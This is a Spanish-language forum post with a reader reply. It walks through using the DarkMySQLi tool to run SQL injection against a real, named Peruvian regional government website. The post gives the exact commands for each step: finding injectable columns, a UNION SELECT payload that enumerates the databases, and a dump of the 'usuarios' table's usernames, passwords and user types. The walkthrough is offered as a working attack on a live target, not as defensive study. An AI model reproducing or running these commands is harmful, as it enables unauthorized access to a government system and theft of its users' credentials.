SQL Inyeccion con DarkMySQLi

DarkMySQLi es una herramienta de código abierto creada en python, que nos permite elaborar un ataque de SQL INJECTION de forma automátizada y extraer la información de las base de datos de una web.

Link de descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vamos a la acción



El primer paso que haremos primero sera encontrar la web vulnerable en este caso utilizare la siguiente :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ejecutaremos el siguiente comando para el testeo de la web :

python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3" --findcol

como vemos nos voto la información principal para saber si es vulnerable a la Inyección DarkMySQLi  :

[!] darkMySQLi URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

luego que sabemos que es vulnerable a la inyección pondremos el siguiente:

python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --full

(solo reemplazamos el numero " 3 " por " darkc0de "




Como vemos nos a votado las columnas de las base de datos clasificándolas por cada uno de ellas en sus respectivas "tablas" de manera que podamos identificarlos fácilmente los datos almacenados.

Lo que haremos a continuación sera dumpear las columnas de los usuarios:

python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --dump -D regionsanmartin_gob_pe -T usuarios -C nomb_usuario,pass,tipo_usuario

Imagen completa de usuarios



Espero les aya gustado mucho el Post, un saludo y un abrazo desde PERU"

Gracias Browsernet me encantan leer tus entradas, es bueno tener alternativas para este tipo de ataques, saludos hasta Perú desde México

Enviado desde mi HTC One mediante Tapatalk